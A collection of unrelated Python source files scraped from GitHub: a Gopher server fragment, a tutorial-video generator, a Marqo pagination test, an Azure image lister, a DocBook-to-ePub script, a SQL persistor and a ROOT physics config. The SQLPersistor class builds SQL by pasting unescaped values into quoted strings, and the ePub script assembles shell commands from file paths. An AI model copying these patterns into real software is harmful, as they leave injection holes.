GopherServer.addPeriodOnNewLine("Received file path does not exist.\r\n").encode('ascii'))
clientSock.close()
def main():
# Create a server
if len(sys.argv) > 1:
try:
server = GopherServer(int(sys.argv[1]))
except ValueError:
print("Error in specifying port. Creating server on default port.")
server = GopherServer()
else:
server = GopherServer()
# Listen forever
print("Listening on port " + str(server.port))
server.listen()
main()
| connellyj/gopher | gopherServer.py | gopherServer.py | py | 4,062 | python | en | code | 0 | github-code | 36 |
8559847117 | #!/usr/bin/env python3.11
"""
Video Command Invoker (Command Design Pattern)
This Python script defines the `VideoInvoker` class, a central component in the Command
design pattern for executing video-related commands. It manages the video generation
process and serves as the invoker in the pattern.
The `VideoInvoker` class provides methods for executing video commands, including
starting subshells, running code animations, and interacting with a web browser to
create instructional videos. It collaborates with classes like `CodeAnimationGenerator`,
`BrowserInteraction`, and `ProcessManagement` to record video segments and assemble
them into a final video.
Usage:
To create and execute a sequence of video commands, initialize an instance of
the `VideoInvoker` class and use its methods. This class works with command objects
that encapsulate specific actions and parameters.
Example:
```python
invoker = VideoInvoker()
# Create command objects
animation_generator = CodeAnimationGenerator(text_mapping, INTRO_CODE, OUTRO_CODE)
start_subshell = StartSubshell("server_subshell")
run_server = ExecuteSubshellCommand("server_subshell", "python3.11 test_server.py &")
browser_interaction = BrowserInteraction("http://localhost:5000/", "Webpage narration")
kill_subshell = TerminateSubshell("server_subshell")
# Execute command objects
invoker.execute_command(animation_generator)
invoker.execute_command(start_subshell)
invoker.execute_command(run_server)
invoker.execute_command(browser_interaction)
invoker.execute_command(kill_subshell)
FINAL_VIDEO_NAME = "final_video.mp4"
invoker.dump_file(FINAL_VIDEO_NAME)
```
Author:
Roman Parise
"""
# Project imports
from .video_receiver import VideoReceiver
from .command import Command, CreateClipCommand
from .code_animation_generator import CodeAnimationGenerator
from .browser_interaction import BrowserInteraction
from .process_management import StartSubshell, ExecuteSubshellCommand, TerminateSubshell
class VideoInvoker:
"""
A class that invokes video-related commands.
"""
def __init__(self):
"""
Initializes a VideoInvoker with a VideoReceiver.
"""
self.video_receiver = VideoReceiver()
def execute_command(self, command: Command):
"""
Executes a given command.
Args:
command (Command): The command to execute.
"""
if isinstance(command, CreateClipCommand):
command.set_receiver(self.video_receiver)
command.execute()
else:
command.execute()
def dump_file(self, output_filename: str = "output.mp4"):
"""
Saves the full movie to an mp4 file using write_videofile.
Args:
output_filename (str): The name of the output video file.
"""
self.video_receiver.dump_file(output_filename)
if __name__ == "__main__":
invoker = VideoInvoker()
# Write Flask server
text_mapping = [
{
"narration_text": "First, we're going to make the necessary imports.",
"code_text": """
vim test_server.py
ifrom flask import Flask
""",
},
{
"narration_text": "Then, we're going to instantiate our webapp and create a route.",
"code_text": """
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
""",
},
{
"narration_text": "Finally, we'll run the app.",
"code_text": """
if __name__ == '__main__':
app.run()
""",
},
{
"narration_text": "We're now going to run the server.",
"code_text": """
<Escape>
:x
""",
},
]
INTRO_CODE = "rm -rf test_server.py; clear"
OUTRO_CODE = "rm -rf test_server.py; clear"
# Initialize the CodeAnimationGenerator
animation_generator = CodeAnimationGenerator(text_mapping, INTRO_CODE, OUTRO_CODE)
invoker.execute_command(animation_generator)
# Start subshell for server
start_subshell = StartSubshell("server_subshell")
invoker.execute_command(start_subshell)
# Run server in subshell
run_server = ExecuteSubshellCommand(
"server_subshell", "python3.11 test_server.py &"
)
invoker.execute_command(run_server)
# Test the BrowserInteraction class
browser_interaction = BrowserInteraction(
"http://localhost:5000/",
"As you can see, the webpage is rendered as expected.",
)
invoker.execute_command(browser_interaction)
# Kill subshell
kill_subshell = TerminateSubshell("server_subshell")
invoker.execute_command(kill_subshell)
FINAL_VIDEO_NAME = "final_video.mp4"
invoker.dump_file(FINAL_VIDEO_NAME)
print(f"Animation video saved to {FINAL_VIDEO_NAME}")
| thejackal360/tutgen | tutgen/video_invoker.py | video_invoker.py | py | 4,840 | python | en | code | 0 | github-code | 36 |
30338835101 | import marqo
import pprint
import requests
import random
import math
# Test bug in pagination feature of OpenSearch
# Create marqo index
mq = marqo.Client(url='http://localhost:8882')
try:
mq.index("my-first-index").delete()
except:
pass
# Index set number of documents
# 100 random words
mq.create_index("my-first-index")
vocab_source = "https://www.mit.edu/~ecprice/wordlist.10000"
vocab = requests.get(vocab_source).text.splitlines()
num_docs = 100
random.seed(2020)
docs = [{"Title": "a " + (" ".join(random.choices(population=vocab, k=25))),
"_id": str(i)
}
for i in range(num_docs)]
mq.index("my-first-index").add_documents(
docs, auto_refresh=False
)
mq.index("my-first-index").refresh()
search_method = "TENSOR"
# Search for all 100 documents at the same time
# DEBUG FULL RESULTS
debug_res = mq.index("my-first-index").search(
search_method=search_method,
q='a',
limit=num_docs)
debug_res_id_only = [hit["_id"] for hit in debug_res["hits"]]
# Search for pages of 1 document at a time
for page_size in [1]:
print("========================================================")
print(f"{search_method}: Results for page_size = {page_size}")
paginated_search_results = {"hits": []}
for page_num in range(math.ceil(num_docs / page_size)):
lim = page_size
off = page_num * page_size
# print(f"Now testing: limit={lim}, offset={off}")
page_res = mq.index("my-first-index").search(
search_method=search_method,
q='a',
limit=lim, offset=off)
single_page_id_only = [hit["_id"] for hit in page_res["hits"]]
paginated_search_results["hits"].extend(page_res["hits"])
print("========================================================")
print(f"Query for page num {page_num}")
print(f"size: {page_res['limit']}, from: {page_res['offset']}")
expected_res = debug_res_id_only[off:off+lim]
print(f"Paginated result for page num {page_num}: {single_page_id_only}")
print(f"Expected result for page num {page_num}: {expected_res}")
if expected_res != single_page_id_only:
print("DISCREPANCY FOUND.")
page_id_only = [hit["_id"] for hit in paginated_search_results["hits"]]
print("========================================================")
print(f"FULL RESULTS: (length = {len(debug_res['hits'])})")
print(debug_res_id_only)
print(f"PAGINATED: (length = {len(paginated_search_results['hits'])})")
print(page_id_only)
print("Paginated results same as expected full results?")
print(debug_res["hits"] == paginated_search_results["hits"])
| vicilliar/public-code | pagination/os_from_tester.py | os_from_tester.py | py | 2,920 | python | en | code | 0 | github-code | 36 |
70606154344 | __all__ = (
'Persistor',
'SQLPersistor',
'SQLitePersistor',
)
try:
import sqlite3
except Exception:
sqlite3 = None
class Persistor(object):
"""
Class providing methods for persisting input (persistence occurs when the
`persist` method is called on a `Model` instance)
"""
def persist(self, attributes):
"""
Persist the specified `attributes`
Args:
attributes (dict): the attributes
Returns:
bool: the result
Raises:
NotImplementedError: if this method is not overridden by an
inheriting class
"""
raise NotImplementedError
class SQLPersistor(Persistor):
"""
Class providing methods for persisting input to a SQL DB (persistence occurs
when the `persist` method is called on a `Model` instance)
Instance Attributes:
table_name (str): the table name
key_attribute_names (set of str): the key-attribute names (in the future
complex keys will likely be supported, for now only simple/singular
keys are supported)
"""
def __init__(
self,
table_name,
key_attribute_name=None,
):
self.table_name = table_name
self.key_attribute_names = frozenset([key_attribute_name]) if \
key_attribute_name else frozenset()
@property
def connection(self):
"""
Lazy-load and return the "Connection" instance
Returns:
mixed: the instantiated/connected "Connection" instance
Raises:
NotImplementedError: if the `_connect` method is not overridden by
an inheriting class
"""
if not hasattr(self, '_connection'):
self._connection = self._connect()
return self._connection
def persist(self, attributes):
"""
Persist the specified `attributes`
Args:
attributes (dict): the attributes
Returns:
mixed: the mapped INSERT/UPDATE result
Raises:
RuntimeError: if a dependency could not be loaded or a connection to
DB could not be established
"""
key_attributes, non_key_attributes = \
self._partition_attributes(attributes)
if key_attributes and all(key_attributes.values()):
return self._update(key_attributes, non_key_attributes)
return self._insert(non_key_attributes)
def _column_name(self, attribute_name):
"""
Convert an attribute-name to a column-name
Args:
attribute_name (str): the attribute-name
Returns:
str: the column-name
"""
return ''.join(
str.capitalize(attribute_name_part)
for attribute_name_part in attribute_name.split('_')
)
def _column_value(self, attribute_value):
"""
Sanitize and quote an attribute-value
Args:
attribute_value (mixed): the attribute-value
Returns:
str: the sanitized and quoted attribute-value
"""
return "'%s'" % attribute_value if attribute_value is not None else \
'NULL'
def _connect(self):
"""
Establish a new connection to a DB
Returns:
mixed: the new connection instance
Raises:
NotImplementedError: if this method is not overridden by an
inheriting class
"""
raise NotImplementedError
def _insert(self, non_key_attributes):
"""
Perform an INSERT operation based on the specified `non_key_attributes`
Args:
non_key_attributes (dict): the non-key-attributes
Returns:
mixed: the mapped INSERT result
"""
return self._map_insert_result(self.connection.execute(self._insert_sql(
non_key_attributes)))
def _insert_sql(self, non_key_attributes):
"""
Generate the SQL required for an INSERT operation based on the specified
`non_key_attributes`
Args:
non_key_attributes (dict): the non-key-attributes
Returns:
str: the SQL string
"""
return 'INSERT INTO %s (%s) VALUES (%s)' % (
self.table_name,
', '.join(
self._column_name(attribute_name)
for attribute_name in non_key_attributes.keys()
),
', '.join(
self._column_value(attribute_value)
for attribute_value in non_key_attributes.values()
),
)
def _map_insert_result(self, result):
"""
Map the result from an INSERT operation
Args:
result (mixed): the unmapped INSERT result
Returns:
mixed: the mapped INSERT result
"""
return result
def _map_update_result(self, result):
"""
Map the result from an UPDATE operation
Args:
result (mixed): the unmapped UPDATE result
Returns:
mixed: the mapped UPDATE result
"""
return result
def _partition_attributes(self, attributes):
"""
Partition the specified `attributes` into two `dict(s)`, one of the
`key_attributes` and another of the `non_key_attributes`
Args:
attributes (dict): the attributes
Returns:
tuple (of dicts): a `tuple` of the `key_attributes` and
`non_key_attributes`
"""
key_attributes, non_key_attributes = {}, {}
key_attribute_names = self.key_attribute_names
for attribute_name, attribute_value in attributes.items():
if attribute_name in key_attribute_names:
key_attributes[attribute_name] = attribute_value
else:
non_key_attributes[attribute_name] = attribute_value
return (key_attributes, non_key_attributes)
def _update(
self,
key_attributes,
non_key_attributes
):
"""
Perform an UPDATE operation based on the specified `key_attributes` and
`non_key_attributes`
Args:
key_attributes (dict): the key-attributes
non_key_attributes (dict): the non-key-attributes
Returns:
mixed: the mapped UPDATE result
"""
return self._map_update_result(self.connection.execute(self._update_sql(
key_attributes, non_key_attributes)))
def _update_sql(
self,
key_attributes,
non_key_attributes
):
"""
Generate the SQL required for an UPDATE operation based on the specified
`key_attributes` and `non_key_attributes`
Args:
key_attributes (dict): the key-attributes
non_key_attributes (dict): the non-key-attributes
Returns:
str: the SQL string
"""
return 'UPDATE %s SET %s WHERE %s' % (
self.table_name,
', '.join(
'%s = %s' % (self._column_name(attribute_name),
self._column_value(attribute_value))
for attribute_name, attribute_value in
non_key_attributes.items()
),
' AND '.join(
'%s = %s' % (self._column_name(attribute_name),
self._column_value(attribute_value))
for attribute_name, attribute_value in
key_attributes.items()
)
)
class SQLitePersistor(SQLPersistor):
"""
Class providing methods for persisting input to a SQLite DB (persistence
occurs when the `persist` method is called on a `Model` instance)
Instance Attributes:
database_file_path (str): the database file-path
table_name (str): the table name
key_attribute_names (set of str): the key-attribute names (in the future
complex keys will likely be supported, for now only simple/singular
keys are supported)
"""
def __init__(
self,
database_file_path,
table_name,
key_attribute_name=None
):
super(SQLitePersistor, self).__init__(table_name, key_attribute_name)
self.database_file_path = database_file_path
def _connect(self):
"""
Establish a new connection to a SQLite DB
Returns:
sqlite3.Connection: the new connection instance
Raises:
RuntimeError: if the `sqlite3` library was not successfully loaded
"""
if sqlite3 is None:
raise RuntimeError
return sqlite3.connect(self.database_file_path)
def _map_insert_result(self, result):
"""
Map the result from an INSERT operation
Args:
result (mixed): the unmapped INSERT result
Returns:
mixed: the mapped INSERT result
"""
return {next(iter(self.key_attribute_names)): result.lastrowid}
def _map_update_result(self, result):
"""
Map the result from an UPDATE operation
Args:
result (mixed): the unmapped UPDATE result
Returns:
mixed: the mapped UPDATE result
"""
return {next(iter(self.key_attribute_names)): result.lastrowid}
| jzaleski/formulaic | formulaic/persistors.py | persistors.py | py | 9,411 | python | en | code | 1 | github-code | 36 |
13535976062 | import csv
import json
from collections import OrderedDict
def import_jsonfile_as_OrderedDict(json_filepath):
f = open(json_filepath, "r")
return json.loads(f.read(), object_pairs_hook = OrderedDict)
def export_dict_to_jsonfile(dic, json_filepath, indent = 2, separators=(',', ': ')):
outstr = json.dumps(dic, indent = indent, separators = separators)
with open(json_filepath, "w") as outfile:
outfile.write(outstr)
def get_entries_in_csv_col(csv_filepath, col_name, delimiter = ','):
with open(csv_filepath) as csv_file:
csv_reader = csv.reader(csv_file, delimiter = delimiter)
i_col_requested = 0
res = []
for i_row, row in enumerate(csv_reader):
if i_row == 0:
for i_col, col in enumerate(row):
if col == col_name: i_col_requested = i_col
else:
res.append(row[i_col_requested])
return res
| tyjyang/CampaignManager | lib/io_tools.py | io_tools.py | py | 944 | python | en | code | 0 | github-code | 36 |
17848204772 | #! /usr/bin/env python3
import os
import re
from azure.identity import DefaultAzureCredential
from azure.mgmt.compute import ComputeManagementClient
# Variables
subscription_id = os.environ.get("AZURE_SUBSCRIPTION_ID")
location = "eastus"
publisher_name = "PaloAltoNetworks"
# Acquire a credential object
token_credential = DefaultAzureCredential()
# Acquire a compute client
compute_client = ComputeManagementClient(token_credential, subscription_id)
# Gather version numbers per offer and per sku
fixed_bnd1 = []
offer = "vmseries1" # Fixed CPU
sku = "bundle1"
images = compute_client.virtual_machine_images.list(location, publisher_name, offer, sku)
for image in images:
fixed_bnd1.append(image.name)
fixed_bnd2 = []
offer = "vmseries1" # Fixed CPU
sku = "bundle2"
images = compute_client.virtual_machine_images.list(location, publisher_name, offer, sku)
for image in images:
fixed_bnd2.append(image.name)
fixed_byol = []
offer = "vmseries1" # Fixed CPU
sku = "byol"
images = compute_client.virtual_machine_images.list(location, publisher_name, offer, sku)
for image in images:
fixed_byol.append(image.name)
flex_bnd1_v9 = []
flex_bnd2_v9 = []
flex_bnd3_v9 = []
flex_byol_v9 = []
panorama_v9 = []
flex_bnd1 = []
offer = "vmseries-flex" # Flex
sku = "bundle1"
images = compute_client.virtual_machine_images.list(location, publisher_name, offer, sku)
for image in images:
if image.name[0]=="9":
flex_bnd1_v9.append(image.name)
else:
flex_bnd1.append(image.name)
flex_bnd2 = []
offer = "vmseries-flex" # Flex
sku = "bundle2"
images = compute_client.virtual_machine_images.list(location, publisher_name, offer, sku)
for image in images:
if image.name[0]=="9":
flex_bnd2_v9.append(image.name)
else:
flex_bnd2.append(image.name)
flex_bnd3 = []
offer = "vmseries-flex" # Flex
sku = "bundle3"
images = compute_client.virtual_machine_images.list(location, publisher_name, offer, sku)
for image in images:
if image.name[0]=="9":
flex_bnd3_v9.append(image.name)
else:
flex_bnd3.append(image.name)
flex_byol = []
offer = "vmseries-flex" # Flex
sku = "byol"
images = compute_client.virtual_machine_images.list(location, publisher_name, offer, sku)
for image in images:
if image.name[0]=="9":
flex_byol_v9.append(image.name)
else:
flex_byol.append(image.name)
panorama = []
offer = "panorama" # Panorama
sku = "byol"
images = compute_client.virtual_machine_images.list(location, publisher_name, offer, sku)
for image in images:
if image.name[0]=="9":
panorama_v9.append(image.name)
else:
panorama.append(image.name)
# Output in markdown format
result = "\n# Azure\n"
result += "\n## Flexible CPU (Offer: `vmseries-flex`)\n"
result += "\n### BYOL (SKU: `byol`)\n"
for sku in flex_byol_v9:
result += "`" + sku + "` "
for sku in flex_byol:
result += "`" + sku + "` "
result += "\n### PAYG Bundle 1 (SKU: `bundle1`)\n"
for sku in flex_bnd1_v9:
result += "`" + sku + "` "
for sku in flex_bnd1:
result += "`" + sku + "` "
result += "\n### PAYG Bundle 2 (SKU: `bundle2`)\n"
for sku in flex_bnd2_v9:
result += "`" + sku + "` "
for sku in flex_bnd2:
result += "`" + sku + "` "
result += "\n### PAYG Bundle 3 (SKU: `bundle3`)\n"
for sku in flex_bnd3_v9:
result += "`" + sku + "` "
for sku in flex_bnd3:
result += "`" + sku + "` "
result += "\n## Fixed CPU (Offer: `vmseries1`)\n"
result += "\n### BYOL (SKU: `byol`)\n"
for sku in fixed_byol:
result += "`" + sku + "` "
result += "\n### PAYG Bundle 1 (SKU: `bundle1`)\n"
for sku in fixed_bnd1:
result += "`" + sku + "` "
result += "\n### PAYG Bundle 2 (SKU: `bundle2`)\n"
for sku in fixed_bnd2:
result += "`" + sku + "` "
result += "\n"
result += "\n## Panorama (Offer: `panorama`, SKU: `byol`)\n"
for sku in panorama_v9:
result += "`" + sku + "` "
for sku in panorama:
result += "`" + sku + "` "
print(result) | jamesholland-uk/pan-os-versions-in-public-cloud-providers | azure-processing.py | azure-processing.py | py | 3,946 | python | en | code | 5 | github-code | 36 |
6742324568 | # -*- coding: utf-8 -*-
# file docbook2epub.py
# This file is part of LyX, the document processor.
# Licence details can be found in the file COPYING.
#
# \author Thibaut Cuvelier
#
# Full author contact details are available in file CREDITS
# Usage:
# python docbook2epub.py java_binary saxon_path xsltproc_path xslt_path in.docbook in.orig.path out.epub
from __future__ import print_function
import glob
import os
import shutil
import sys
import tempfile
import zipfile
from io import open # Required for Python 2.
def _parse_nullable_argument(arg):
return arg if arg != '' and arg != 'none' else None
class ImageRename:
def __init__(self, opf_path, local_path, epub_path):
self.opf_path = opf_path
self.local_path = local_path
self.epub_path = epub_path
class DocBookToEpub:
def __init__(self, args=None):
if args is None:
args = sys.argv
if len(args) != 8:
print('Exactly eight arguments are expected, only %s found: %s.' % (len(args), args))
sys.exit(1)
self.own_path = sys.argv[0]
self.java_path = _parse_nullable_argument(sys.argv[1])
self.saxon_path = _parse_nullable_argument(sys.argv[2])
self.xsltproc_path = _parse_nullable_argument(sys.argv[3])
self.xslt_path = _parse_nullable_argument(sys.argv[4])
self.input = sys.argv[5]
self.input_path = sys.argv[6]
self.output = sys.argv[7]
self.script_folder = os.path.dirname(self.own_path) + '/../'
print('Generating ePub with the following parameters:')
print(self.own_path)
print(self.java_path)
print(self.saxon_path)
print(self.xsltproc_path)
print(self.xslt_path)
print(self.input)
print(self.input_path)
print(self.output)
# Precompute paths that will be used later.
self.output_dir = tempfile.mkdtemp().replace('\\', '/')
self.package_opf = self.output_dir + '/OEBPS/package.opf' # Does not exist yet,
print('Temporary output directory: %s' % self.output_dir)
if self.xslt_path is None:
self.xslt = self.script_folder + 'docbook/epub3/chunk.xsl'
else:
self.xslt = self.xslt_path + '/epub3/chunk.xsl'
print('XSLT style sheet to use:')
print(self.xslt)
if self.saxon_path is None:
self.saxon_path = self.script_folder + 'scripts/saxon6.5.5.jar'
# These will be filled during the execution of the script.
self.renamed = None
def gracefully_fail(self, reason):
print('docbook2epub fails: %s' % reason)
shutil.rmtree(self.output_dir, ignore_errors=True)
sys.exit(1)
def start_xslt_transformation(self):
command = None
if self.xsltproc_path is not None:
command = self.start_xslt_transformation_xsltproc()
elif self.java_path is not None:
command = self.start_xslt_transformation_saxon6()
if command is None:
self.gracefully_fail('no XSLT processor available')
print('Command to execute:')
print(command)
quoted_command = command
if os.name == 'nt':
# On Windows, it is typical to have spaces in folder names, and that requires to wrap the whole command
# in quotes. On Linux, this might create errors when starting the command.
quoted_command = '"' + command + '"'
# This could be simplified by using subprocess.run, but this requires Python 3.5.
if os.system(quoted_command) != 0:
self.gracefully_fail('error from the XSLT processor')
print('Generated ePub contents.')
def start_xslt_transformation_xsltproc(self):
params = '-stringparam base.dir "' + self.output_dir + '"'
return '"' + self.xsltproc_path + '" ' + params + ' "' + self.xslt + '" "' + self.input + '"'
def start_xslt_transformation_saxon6(self):
params = 'base.dir=%s' % self.output_dir
executable = '"' + self.java_path + '" -jar "' + self.saxon_path + '"'
return executable + ' "' + self.input + '" "' + self.xslt + '" "' + params + '"'
def get_images_from_package_opf(self):
images = []
# Example in the OPF file:
# <item id="d436e1" href="D:/LyX/lib/images/buffer-view.svgz" media-type="image/SVGZ"/>
# The XHTML files are also <item> tags:
# <item id="id-d0e2" href="index.xhtml" media-type="application/xhtml+xml"/>
try:
with open(self.package_opf, 'r') as f:
for line in f.readlines():
if '<item' in line and 'media-type="image' in line:
images.append(line.split('href="')[1].split('"')[0])
except FileNotFoundError:
print('The package.opf file was not found, probably due to a DocBook error. The ePub file will be corrupt.')
return images
def get_image_changes(self):
epub_folder = 'images/'
changes = []
for image in self.get_images_from_package_opf():
if os.path.exists(image):
file_system_path = image
elif os.path.exists(self.input_path + image):
file_system_path = self.input_path + image
else:
file_system_path = ''
changes.append(ImageRename(image, file_system_path, epub_folder + os.path.basename(image)))
return changes
def change_image_paths(self, file):
# This could be optimised, as the same operation is performed a zillion times on many files:
# https://www.oreilly.com/library/view/python-cookbook/0596001673/ch03s15.html
with open(file, 'r', encoding='utf8') as f:
contents = list(f)
with open(file, 'w', encoding='utf8') as f:
for line in contents:
for change in self.renamed:
line = line.replace(change.opf_path, change.epub_path)
f.write(line)
def copy_images(self):
# Copy the assets to the OEBPS/images/. All paths are available in OEBPS/package.opf, but they must also be
# changed in the XHTML files. Typically, the current paths are absolute.
# First, get the mapping old file => file in the ePub archive.
self.renamed = self.get_image_changes()
# Then, transform all paths (both OPF and XHTML files).
self.change_image_paths(self.output_dir + '/OEBPS/package.opf')
for file in glob.glob(self.output_dir + '/OEBPS/*.xhtml'):
self.change_image_paths(file)
# Ensure that the destination path exists. OEBPS exists due to the DocBook-to-ePub transformation.
if not os.path.exists(self.output_dir + '/OEBPS/images/'):
os.mkdir(self.output_dir + '/OEBPS/images/')
# Finally, actually copy the image files.
for change in self.renamed:
shutil.copyfile(change.local_path, self.output_dir + '/OEBPS/' + change.epub_path)
def create_zip_archive(self):
with zipfile.ZipFile(self.output, 'w', zipfile.ZIP_DEFLATED) as zip:
# Python 3.5 brings the `recursive` argument. For older versions, this trick is required...
# for file in glob.glob(output_dir + '/**/*', recursive=True):
for file in [os.path.join(dp, f) for dp, dn, filenames in os.walk(self.output_dir) for f in filenames]:
zip.write(file, os.path.relpath(file, self.output_dir), compress_type=zipfile.ZIP_STORED)
shutil.rmtree(self.output_dir)
print('Generated ePub.')
def transform(self):
self.start_xslt_transformation()
self.copy_images()
self.create_zip_archive()
if __name__ == '__main__':
DocBookToEpub(sys.argv).transform()
| cburschka/lyx | lib/scripts/docbook2epub.py | docbook2epub.py | py | 7,833 | python | en | code | 33 | github-code | 36 |
74160112423 | #!/bin/python3
import sys
def icecreamParlor(m, arr):
res = []
for first in range(len(arr) - 1):
for second in range(first + 1, len(arr)):
if (arr[first] + arr[second]) == m:
res.append(first + 1)
res.append(second + 1)
return res
if __name__ == "__main__":
t = int(input().strip())
for a0 in range(t):
m = int(input().strip())
n = int(input().strip())
arr = list(map(int, input().strip().split(' ')))
result = icecreamParlor(m, arr)
print (" ".join(map(str, result)))
| CodingProgrammer/HackerRank_Python | (Search)Ice_Cream_Parlor.py | (Search)Ice_Cream_Parlor.py | py | 612 | python | en | code | 0 | github-code | 36 |
26741108051 | import ROOT
from xAH_config import xAH_config
import sys, os
sys.path.insert(0, os.environ['ROOTCOREBIN']+"/user_scripts/HTopMultilepAnalysis/")
c = xAH_config()
event_branches = ["EventNumber","RunNumber","mc_channel_number","isSS01","dilep_type","trilep_type",
"is_T_T","is_T_AntiT","is_AntiT_T","is_AntiT_AntiT",
"is_TMVA_TMVA","is_TMVA_AntiTMVA","is_AntiTMVA_TMVA","is_AntiTMVA_AntiTMVA",
"nJets_OR_T","nJets_OR_T_MV2c10_70",
]
lep_branches = ["lep_ID_0","lep_Pt_0","lep_Eta_0","lep_Phi_0","lep_EtaBE2_0","lep_deltaRClosestJet_0","lep_isTightSelected_0","lep_isTightSelectedMVA_0","lep_isTrigMatch_0",
"lep_ID_1","lep_Pt_1","lep_Eta_1","lep_Phi_1","lep_EtaBE2_1","lep_deltaRClosestJet_1","lep_isTightSelected_1","lep_isTightSelectedMVA_1","lep_isTrigMatch_1"]
branches_to_activate = event_branches + lep_branches
# Trick to pass the list as a comma-separated string to the C++ algorithm
branches_to_activate_str = ",".join(branches_to_activate)
# Instantiate the main algorithm
base_dir = "/imports/home/mmilesi/PhD/ttH_MultiLeptons/RUN2/HTopMultilepAnalysisCode/trunk/"
#base_dir = "/afs/cern.ch/user/m/mmilesi/ttH/RUN2/HTopMultilepAnalysisCode/trunk"
HTopMultilepNTupReprocesserDict = { "m_name" : "HTopMultilepNTupReprocesser",
"m_debug" : False,
"m_verbose" : False,
"m_outputNTupStreamName" : "output",
"m_inputBranches" : branches_to_activate_str,
# "m_weightToCalc" : "QMisID,MM",
"m_weightToCalc" : "MM",
# "m_weightToCalc" : "QMisID",
"m_QMisIDRates_dir" : "$ROOTCOREBIN/data/HTopMultilepAnalysis/External/",
"m_QMisIDRates_Filename_T" : "Rates_v29_Tight.root",
"m_QMisIDRates_Filename_AntiT" : "Rates_v29_AntiTight.root",
# "m_QMisIDRates_Filename_T" : "Rates_v27_For3l.root",
# "m_QMisIDRates_Filename_AntiT" : "Rates_v27_For3l_AntiT.root",
# "m_QMisIDRates_Filename_T" : "Rates_Data_3l_2D_tight.root",
# "m_QMisIDRates_Filename_AntiT" : "Rates_Data_3l_2D_Loose.root",
"m_QMisIDRates_Histname_T" : "LikelihoodEtaPtTight",
"m_QMisIDRates_Histname_AntiT" : "LikelihoodEtaPtLoose",
# "m_QMisIDRates_Histname_T" : "LikelihoodEtaPt",
# "m_QMisIDRates_Histname_AntiT" : "LikelihoodEtaPt",
"m_useTAntiTRates" : False, # --> set this option to True if QMisID rates have NOT been measured independently for T and AntiT electrons - Set True for v19
#
# ------------------------------------------------------------
#
# v26
#
#"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/CombinedEfficiencies_LeptonMVA_410501",
#"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/CombinedEfficiencies_LeptonMVA_410000",
#
#"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/CombinedEfficiencies_LeptonCutBased_410501",
#"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/CombinedEfficiencies_LeptonCutBased_410000",
#"m_useCutBasedLep" : True,
#
#"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/MMRates_DATA/OutputPlots_MMRates_25ns_v26_LeptonMVA_DDQMisID",
#"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/OutputPlots_MMClosureRates_25ns_v26_LeptonMVA", # Closure
#
# ------------------------------------------------------------
#
# v27
#
# "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v27/OutputPlots_MMRates_25ns_v27",
# "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v27/OutputPlots_MMRates_TTWx2_25ns_v27",
# "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v27_v2/OutputPlots_MMClosureRates_25ns_v27", # Closure
#
# ------------------------------------------------------------
#
# v28
#
# "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v28/OutputPlots_MMRates_25ns_v28",
# "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v28/OutputPlots_MMRates_25ns_v28_NewBinning",
#
# "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v28/OutputPlots_MMRates_25ns_v28_FINAL_BINNING_2",
# "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v28/OutputPlots_MMClosureRates_25ns_v28_FINAL_BINNING_2", # Closure
#
# ------------------------------------------------------------
#
# v29
#
"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v29/OutputPlots_MMRates_25ns_v29",
#
# ------------------------------------------------------------
#
# "m_parametrisation_list" : "Real_El:Pt,Real_Mu:Pt,Fake_El:Pt,Fake_Mu:Pt",
# "m_parametrisation_list" : "Real_El:Pt,Real_Mu:Pt,Fake_El:PtxEta,Fake_Mu:Pt",
# "m_parametrisation_list" : "Real_El:Pt,Real_Mu:Pt,Fake_El:NBJets_VS_Pt,Fake_Mu:Pt",
# "m_parametrisation_list" : "Real_El:Pt,Real_Mu:DistanceClosestJet_VS_Pt,Fake_El:NBJets_VS_Pt,Fake_Mu:Pt",
"m_parametrisation_list" : "Real_El:Pt,Real_Mu:Pt,Fake_El:NBJets_VS_Pt,Fake_Mu:DistanceClosestJet_VS_Pt",
"m_useScaledFakeElEfficiency_ElEl" : True,
#
# "m_systematics_list" : "Nominal:",
# "m_systematics_list" : "Nominal:,Stat:UncorrBins",
"m_systematics_list" : "Nominal:,Stat:UncorrBins,ND_TTV:CorrBins,ND_VV:CorrBins,ND_OtherPromptSS:CorrBins,ND_FakesOS:CorrBins,N_QMisID:UncorrBins,D_QMisID:UncorrBins",
"m_correlatedMMWeights" : False,
#
"m_useTrigMatchingInfo" : False,
#
# "m_Efficiency_Filename" : "LeptonEfficiencies.root",
# "m_Efficiency_Filename" : "LeptonEfficiencies_physics_Main_FixedRescaling_25_07_17.root",
"m_Efficiency_Filename" : "LeptonEfficiencies_physics_Main_FixedRescaling_26_07_17.root",
# "m_Efficiency_Filename" : "LeptonEfficiencies_physics_Main_FixedRescaling_29_07_17.root",
# "m_Efficiency_Filename" : "LeptonEfficiencies_FakeElPtRescaledPhConv.root",
# "m_Efficiency_Filename" : "LeptonEfficiencies_RealMuDistanceClosestJetVSPt.root",
#
"m_doMMClosure" : False,
"m_useTEfficiency" : False,
}
# Instantiate the NTupleSvc algorithm
ntuplesvc = ROOT.EL.NTupleSvc(HTopMultilepNTupReprocesserDict["m_outputNTupStreamName"])
# Copy ALL branches over from the input TTree
print("Copying all branches from input TTree to output...")
ntuplesvc.copyBranch(".*")
# Add the algorithms to the job.
#
# Here order matters!
c._algorithms.append(ntuplesvc)
c.setalg("HTopMultilepNTupReprocesser", HTopMultilepNTupReprocesserDict)
